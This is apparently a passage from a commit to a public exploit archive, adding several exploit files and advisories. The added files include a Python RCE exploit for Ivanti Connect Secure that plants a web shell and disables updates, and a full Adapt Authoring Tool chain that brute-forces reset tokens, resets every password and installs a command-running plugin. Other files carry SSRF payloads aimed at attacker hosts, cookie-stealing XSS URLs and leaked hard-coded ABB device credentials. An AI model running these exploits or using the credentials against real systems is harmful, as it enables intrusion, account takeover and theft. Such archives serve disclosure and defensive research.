OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5895
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5895.php
CVE ID: CVE-2024-51546
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-51546
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
Cookie: PHPSESSID=xxx; context1=xxx; globals={"currentUser":{"username":"aamuser","authdata":"YWFtdXNlcjpkZWZhdWx0","mangledAuth":"bXVidmZnO2Vmc3Z0Ym45YjczMzY2ODo6MjQyODQ7Mg==","loginExpirySeconds":0},"loggedIn":true,"lang":"en"}; cod=5.27; connect.sid=xxx; csd=44

138
exploits/multiple/remote/52213.py Executable file
View file

@ -0,0 +1,138 @@
# Exploit Title: Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)
# Date: 2025-01-11
# Exploit Author: @absholi7ly
# CVE: CVE-2025-0282
import requests
import sys
import struct
import socket
import ssl
import urllib3
import time
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):
payload = b"A" * offset # Fill the buffer
payload += struct.pack("<I", system_address) # Overwrite return address with system()
payload += b"BBBB" # Fake return address
payload += struct.pack("<I", command_address) # Address of the command
payload += command.encode() # Command to execute
return payload
def send_payload(target_ip, payload):
try:
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
ssl_sock = context.wrap_socket(sock, server_hostname=target_ip)
ssl_sock.connect((target_ip, 443))
print(f"[+] Connected to {target_ip} on port 443 (HTTPS).")
exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi"
http_request = (
f"POST {exploit_endpoint} HTTP/1.1\r\n"
f"Host: {target_ip}\r\n"
f"Content-Length: {len(payload)}\r\n"
f"Content-Type: application/x-www-form-urlencoded\r\n"
f"\r\n"
).encode() + payload
ssl_sock.send(http_request)
response = ssl_sock.recv(4096)
ssl_sock.close()
return response.decode(errors="replace")
except Exception as e:
print(f"[-] Error sending payload: {e}")
return None
def exploit_vulnerability(target_ip, command):
payload = create_exploit_payload(command)
response = send_payload(target_ip, payload)
if response:
print("[+] Payload sent successfully.")
else:
print("[-] No response received.")
def upload_web_shell(target_ip, local_shell_path):
try:
with open(local_shell_path, "r") as f:
web_shell_content = f.read()
command = f"echo '{web_shell_content}' > /shell.php"
exploit_vulnerability(target_ip, command)
print("[+] Web shell uploaded successfully at /shell.php.")
verify_shell(target_ip)
except Exception as e:
print(f"[-] Error uploading web shell: {e}")
def verify_shell(target_ip):
shell_url = f"http://{target_ip}/shell.php"
try:
response = requests.get(shell_url, verify=False, timeout=10)
if response.status_code == 200:
print("[+] Web shell is accessible.")
else:
print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}")
except Exception as e:
print(f"[-] Error verifying web shell: {e}")
def execute_shell_command(target_ip, command):
shell_url = f"http://{target_ip}/shell.php"
try:
# Sending the command via POST
response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10)
if response.status_code == 200:
print(f"[+] Command output:\n{response.text.strip()}")
else:
print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}")
except Exception as e:
print(f"[-] Error executing command via web shell: {e}")
def disable_updates(target_ip):
commands = [
"systemctl stop apt-daily.service",
"systemctl disable apt-daily.service"
]
for command in commands:
execute_shell_command(target_ip, command)
print("[+] System updates disabled successfully.")
def main():
if len(sys.argv) != 3:
print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>")
sys.exit(1)
target_ip = sys.argv[1]
local_shell_path = sys.argv[2]
# Upload the web shell
upload_web_shell(target_ip, local_shell_path)
while True:
command = input("Enter command to execute on the target (or 'exit' to quit): ")
if command.lower() == "exit":
print("Exiting...")
break
execute_shell_command(target_ip, command)
if __name__ == "__main__":
main()

293
exploits/multiple/webapps/52208.py Executable file
View file

@ -0,0 +1,293 @@
# Exploit Title: Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)
# Date: 2024-11-24
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.adaptlearning.org/
# Software Link: https://github.com/adaptlearning/adapt_authoring
# Version: 0.11.3
# CVE Identifier: CVE-2024-50672 , CVE-2024-50671
import io
import sys
import json
import zipfile
import argparse
import requests
import textwrap
def get_session_cookie(username, password):
data = {"email": username, "password": password}
res = requests.post(f"{args.url}/api/login", data=data)
if res.status_code == 200:
print(f"[+] Login as {username}")
return res.cookies.get_dict()
return None
def get_users():
session_cookie = get_session_cookie(args.username, args.password)
if session_cookie is None:
print("[-] Login failed")
sys.exit()
res = requests.get(f"{args.url}/api/user", cookies=session_cookie)
users = [
{"email": user["email"], "role": user["roles"][0]["name"]}
for user in json.loads(res.text)
]
roles = {"Authenticated User": 1, "Course Creator": 2, "Super Admin": 3}
users.sort(key=lambda user: roles[user["role"]])
for user in users:
print(f"[+] {user['email']} ({user['role']})")
return users
def reset_password(users):
# Overwrite potentially expired password reset tokens
for user in users:
data = {"email": user["email"]}
requests.post(f"{args.url}/api/createtoken", data=data)
print("[+] Generate password reset token for every user")
valid_characters = "0123456789abcdef"
next_tokens = ["^"]
# Ensure that only a single result is returned at a time
while next_tokens:
prev_tokens = next_tokens
next_tokens = []
for token in prev_tokens:
for ch in valid_characters:
data = {"token": {"$regex": token + ch}, "password": "HaXX0r3d!"}
res = requests.put(
f"{args.url}/api/userpasswordreset/w00tw00t",
json=data,
)
# Multiple results returned
if res.status_code == 500:
next_tokens.append(token + ch)
print("[+] Reset every password to HaXX0r3d!")
def create_plugin(plugin_name):
manifest = {
"name": plugin_name,
"version": "1.0.0",
"extension": "exploit",
"main": "/js/main.js",
"displayName": "exploit",
"keywords": ["adapt-plugin", "adapt-extension"],
"scripts": {"adaptpostcopy": "/scripts/postcopy.js"},
}
property = {
"properties": {
"pluginLocations": {
"type": "object",
"properties": {"course": {"type": "object"}},
}
}
}
payload = textwrap.dedent(
f"""
const {{ exec }} = require("child_process");
module.exports = async function (fs, path, log, options, done) {{
try {{
exec("{args.command}");
}} catch (err) {{
log(err);
}}
done();
}};
"""
).strip()
plugin = io.BytesIO()
with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
zip_file.writestr(
f"{plugin_name}/bower.json",
io.BytesIO(json.dumps(manifest).encode()).getvalue(),
)
zip_file.writestr(
f"{plugin_name}/properties.schema",
io.BytesIO(json.dumps(property).encode()).getvalue(),
)
zip_file.writestr(
f"{plugin_name}/js/main.js", io.BytesIO("".encode()).getvalue()
)
zip_file.writestr(
f"{plugin_name}/scripts/postcopy.js",
io.BytesIO(payload.encode()).getvalue(),
)
plugin.seek(0)
return plugin
def find_plugin(cookies, plugin_type, plugin_name):
res = requests.get(f"{args.url}/api/{plugin_type}type", cookies=cookies)
for plugin in json.loads(res.text):
if plugin["name"] == plugin_name:
return plugin["_id"]
return None
def create_course(cookies):
data = {}
res = requests.post(f"{args.url}/api/content/course", cookies=cookies, json=data)
course_id = json.loads(res.text)["_id"]
data = {"_courseId": course_id, "_parentId": course_id}
res = requests.post(
f"{args.url}/api/content/contentobject",
cookies=cookies,
json=data,
)
content_id = json.loads(res.text)["_id"]
data = {"_courseId": course_id, "_parentId": content_id}
res = requests.post(f"{args.url}/api/content/article", cookies=cookies, json=data)
article_id = json.loads(res.text)["_id"]
data = {"_courseId": course_id, "_parentId": article_id}
res = requests.post(f"{args.url}/api/content/block", cookies=cookies, json=data)
block_id = json.loads(res.text)["_id"]
component_id = find_plugin(cookies, "component", "adapt-contrib-text")
data = {
"_courseId": course_id,
"_parentId": block_id,
"_component": "text",
"_componentType": component_id,
}
requests.post(f"{args.url}/api/content/component", cookies=cookies, json=data)
return course_id
def rce(users):
session_cookie = None
for user in users:
if user["role"] == "Super Admin":
session_cookie = get_session_cookie(user["email"], "HaXX0r3d!")
break
if session_cookie is None:
print("[-] Failed to login as Super Account")
sys.exit()
plugin_name = "adapt-contrib-xapi"
print(f"[+] Create malicious plugin : {plugin_name}")
plugin = create_plugin(plugin_name)
print("[+] Scan installed plugins")
plugin_id = find_plugin(session_cookie, "extension", plugin_name)
if plugin_id is None:
print(f"[+] {plugin_name} not found")
else:
print(f"[+] Found {plugin_name}")
print(f"[+] Remove {plugin_name}")
requests.delete(
f"{args.url}/api/extensiontype/{plugin_id}",
cookies=session_cookie,
)
print("[+] Upload plugin")
files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
requests.post(
f"{args.url}/api/upload/contentplugin",
cookies=session_cookie,
files=files,
)
print("[+] Find uploaded plugin")
plugin_id = find_plugin(session_cookie, "extension", plugin_name)
if plugin_id is None:
print(f"[-] {plugin_name} not found")
sys.exit()
print(f"[+] Plugin ID : {plugin_id}")
print("[+] Add plugin to new courses")
data = {"_isAddedByDefault": True}
requests.put(
f"{args.url}/api/extensiontype/{plugin_id}",
cookies=session_cookie,
json=data,
)
print("[+] Create a new course")
course_id = create_course(session_cookie)
print("[+] Build course")
res = requests.get(
f"{args.url}/api/output/adapt/preview/{course_id}",
cookies=session_cookie,
)
if res.status_code == 200:
print("[+] Command execution succeeded")
else:
print("[-] Command execution failed")
print("[+] Remove course")
requests.delete(
f"{args.url}/api/content/course/{course_id}",
cookies=session_cookie,
)
def main():
print("[*] Retrieve user information")
users = get_users()
print("\n[*] Reset password")
reset_password(users)
print("\n[*] Perform remote code execution")
rce(users)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-u",
dest="url",
help="Site URL (e.g. www.adaptlearning.org)",
type=str,
required=True,
)
parser.add_argument(
"-U",
dest="username",
help="Username to authenticate as",
type=str,
required=True,
)
parser.add_argument(
"-P",
dest="password",
help="Password for the specified username",
type=str,
required=True,
)
parser.add_argument(
"-c",
dest="command",
help="Command to execute (e.g. touch /tmp/pwned)",
type=str,
default="touch /tmp/pwned",
)
args = parser.parse_args()
main()

114
exploits/multiple/webapps/52210.txt Normal file
View file

@ -0,0 +1,114 @@
# Author Title: John Page (aka hyp3rlinx)
# Author Website: hyp3rlinx.altervista.org
# Source: https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt
# Vendor: www.ibm.com
[Product]
Navigator for i is a Web console interface where you can perform the key tasks to administer your IBM i.
IBM Navigator for i supports the vast majority of tasks that were available in the System i Navigator Windows client application.
This Web application is part of the base IBM i operating system, and can be easily accessed from your web browser.
[Vulnerability Type]
HTTP Security Token Bypass
[CVE Reference]
CVE-2024-51464
[Security Issue]
IBM i is vulnerable to bypassing Navigator for i interface restrictions. By sending a specially crafted request, an authenticated attacker could exploit this
vulnerability to remotely perform operations that the user is not allowed to perform when using Navigator for i.
The web application generates an HTTP security token ID called "Mn:" with a 19 digit value and is set in the HTTP session response header per user.
Navigator, uses this token for integrity purpose to protect against arbitrary and or malicious HTTP requests. Therefore, upon receipt of a bogus
security token in an HTTP request the server will respond with HTTP 403 Forbidden message.
However, attackers can modify existing tokens to bypass the 403 Forbidden directive to achieve their objectives. Problem is Navigator security token logic
does not properly create or detect if a security token is valid or if it has been tampered with.
Attackers can manipulate the last eight digits of a token by setting them to all 0000s (zeroes) and or increment them by one, token length must be the same.
This can trick the application into processing attacker controlled security tokens as the server thinks it is valid, this undermines the security of this protection.
E.g. Valid HTTP header generated by the server.
Mn: 6844795211344371559
Content-Length: 290
Origin: https://10.1.1.4:2003
Example of a bogus but honored MN header token set by an attacker, padded with zeros and happily accepted by the backend servlet.
Mn: 6844795211300000000
The MN token is generated in the "initProtectionSetting" java method.
public void initProtectionSetting(HttpServletRequest request, HttpServletResponse response) {
initEncryption();
initSession();
[ REDACTED ]
setMagicNumber(magicNumber);
response.setHeader("MN", magicNumber + "");
setUserAgent(request.getHeader("User-Agent"));
}
In the (doFilter) Method we see the check for MN header which sends HTTP 403 on invalid tokens.
String mnStr = hRequest.getHeader("MN");
if (mnStr == null)
mnStr = hRequest.getParameter("MN");
if (!isMnMatched(mnStr, hSession)) {
NavLogger.severe("Forbidden. Incorrect HTTP ID");
NavLogger.info("Request URI: " + requestURI);
hResponse.sendError(403);
return;
Invalid token response will return:
Error 403: SRVE38895F: Error reported: 403
Attacker increments MN or pad with zeros and requests are accepted and the token succeeds.
HTTP 200 OK
[References]
ADV0142855
https://www.ibm.com/support/pages/node/7179509
IBM classified as "CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax".
To be clear HTTP headers are just the delivery method for sending attacker controlled tokens to bypass Navigator protection.
[Exploit/POC]
Intercept Navigator HTTP requests and increment the last one or two digits of the Mn: HTTP
header security token or just pad the last eight digits with all zeroes.
[Network Access]
Remote
[Severity]
Medium
CVSS Base score: 4.3
[Affected versions]
7.5.0,7.4.0, 7.3.0
[Disclosure Timeline]
Vendor Notification: 10/14/2024
Vendor fix and publication: 12/20/2024
12/27/2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

30
exploits/multiple/webapps/52211.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Plane - Server side request forgery (SSRF)
# Date: 2024-01-13
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://plane.so
# Software Link: https://github.com/makeplane/plane/releases/tag/v0.23.1
# Version: v0.23.1
# Tested: Windows 10 x64
Description:
A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Plane application's password recovery functionality. The issue allows attackers to manipulate the email input field and inject a payload to make the server send HTTP requests to attacker-controlled domains.
Steps to Reproduce:
1- Go to the password recovery or login section where the email input is required.
2- Inject the following payload in the email field, replacing the domain with a server you control:
{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}
Send the request:
POST /auth/magic-generate/ HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 62
{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}
3- Monitor your controlled server to observe the incoming HTTP request from the vulnerable system.

91
exploits/multiple/webapps/52212.txt Normal file
View file

@ -0,0 +1,91 @@
# Author Title: John Page (aka hyp3rlinx)
# Author Website: hyp3rlinx.altervista.org
# Source: https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt
# Vendor: www.ibm.com
[Vendor]
www.ibm.com
[Product]
Navigator for i is a Web console interface where you can perform the key tasks to administer your IBM i.
IBM Navigator for i supports the vast majority of tasks that were available in the System i Navigator Windows client application.
This Web application is part of the base IBM i operating system, and can be easily accessed from your web browser.
[Vulnerability Type]
Server Side Request Forgery (SSRF)
[CVE Reference]
CVE-2024-51463
[Security Issue]
IBM i is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system,
potentially leading to network enumeration or facilitating other attacks.
post auth server side request forgery on non managed nodes to external hosts on any TCP ports. There are two call vectors that can be abused here,
one is the "Test TLS connection" but it only allows connections to TCP port 9476.
However, there exists another servlet method called "testConnectPort" which an authenticated attacker can use to connect to any IP and PORT
outside of the LAN. This can be abused for port scans, information disclosure, exfil data., bypass firewall rules to attack non managed nodes
or connect to attacker controlled C2 infrastructure.
This SSRF relies on exploiting a HTTP servlet generated security token bypass CVE-2024-51464, where intercepted HTTP request MN tokens are
incremented or padded with zero. This attacker controlled MN token is now seen as valid and the HTTP 403 Forbidden restriction is bypassed.
[Exploit/POC]
1) attacker payload
POST /Navigator/DispatcherServlet/serviceability/testPortConnection?system=10.1.1.4
{"hostname":"10.2.10.16", "port":445}
2) attackers c2 server
┌──(rootggKali)-[/usr/share]
└─# nc -llvp 445
listening on [any] 445 ...
connect to [10.2.10.16] from victimhost [10.1.1.4] 44569
For port scan we can infer if external host ports are open or closed using error responses.
Port is open:
Error 500: Connection reset
Port is closed
Error 500: A remote host refused an attempted connect
[References]
ADV0142856
https://www.ibm.com/support/pages/node/7179509
[Affected versions]
7.5.0,7.4.0, 7.3.0
[Network Access]
Remote
[Severity]
Medium
CVSS Base score: 5.4
Vendor Notification: 10/14/2024
Vendor fix and publication: 12/20/2024
12/27/2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

78
exploits/multiple/webapps/52222.txt Normal file
View file

@ -0,0 +1,78 @@
ABB Cylon Aspect 3.08.03 (MapServicesHandler) - Authenticated Reflected XSS
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.03
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from an authenticated reflected
cross-site scripting vulnerability. Input passed to the GET parameters 'name'
and 'id' is not properly sanitised before being returned to the user. This
can be exploited to execute arbitrary HTML/JS code in a user's browser session
in context of an affected site.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5897
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5897.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
http://192.168.73.31:7226/servlets/MapServices?cmd=<script>alert(document.cookie)</script>&id=251
http://192.168.73.31:7226/servlets/MapServices?cmd=readScheduleConfig&id=<script>confirm(document.cookie)</script>

90
exploits/multiple/webapps/52223.txt Normal file
View file

@ -0,0 +1,90 @@
ABB Cylon Aspect 3.08.03 Hard-coded Secrets
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.03
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller contains multiple instances
of hard-coded credentials, including usernames, passwords, and encryption
keys embedded in various java classes. This practice poses significant security
risks, allowing attackers to gain unauthorized access and compromise the
system's integrity.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5896
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5896.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ cat secrets.txt
- SynchronizedSecurityServicesHandler.class -> CrET8MEbraME4ahu
- MapInvisibleSchedule.class -> calendar:user
- WDSupervisor.class -> aamservletuser:kakideco
- AESCipher2.class -> uajo4nzibb$#1E4V5262b17f-c3d5-4190-a442-6d251f9da52b
- AESCipher.class -> default
- BrokerURL.class -> aamuser:default
- Schedule.class -> calendar:user
- BfUtils.class -> CrET8MEbraME4ahu
- Context.class -> \037jchabucos:friske
- Db.class -> matrixac1:aam

119
exploits/php/hardware/52218.txt Normal file
View file

@ -0,0 +1,119 @@
ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) Off-by-One Config Write DoS
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: A vulnerability was identified in a PHP script where an off-by-one
error in array access could lead to undefined behavior and potential DoS.
The issue arises in a loop that iterates over an array using a < condition,
allowing access to an out-of-bounds index. This can trigger errors or unexpected
behavior when processing data, potentially crashing the application. Successful
exploitation of this vulnerability can lead to a crash or disruption of service,
especially if the script handles large data sets. This issue can be triggered
via the rowCount POST parameter in the Electronic Security Control device update
script.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5902
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5902.php
CVE ID: CVE-2024-48844
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48844
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
